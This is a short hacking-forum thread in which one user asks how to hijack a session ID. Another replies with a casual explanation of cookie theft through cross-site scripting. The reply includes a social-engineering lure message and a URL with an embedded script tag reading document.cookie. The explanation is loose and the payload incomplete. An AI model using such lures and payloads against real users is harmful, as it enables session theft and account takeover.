Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Session ID's


ghost's Avatar
0 0

How would I hijack a Session ID? I have looked all over google. A nice article would be nice :)


ghost's Avatar
0 0

This is more commonly known as XSS or cross site scripting attacks. Basically you just get someone's session id by some type of malformed request/input to a site, like posting this fictitious text and link:

hahaha omfg lik this is tha funniest shiznit i eva saw!!! w0t a n00b this guy is, check it out lol lol lmao monkeys.com/haxor.php?sessionid=<script>document.cookie</script>

Assuming this was a legitimate vulnerability, and assuming someone was dumb enough to see 'w0t was so funny', they'd quickly find out that they've clicked on a url that sends their cookie info to an evil hax0r's page designed to catch the information. They could then swap out their cookie info with your own and be logged in as 'you'.

It's worth noting that this is a very old trick at this point and majority of xss attacks are easily prevented these days. Then again, as einstein said…

Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.

Can't believe how many sites are vulnerable to the stupidest of things. =)


ghost's Avatar
0 0

Thanks man, so its like kind of cookie poising?


ghost's Avatar
0 0

I don't think thats quite what he's asking…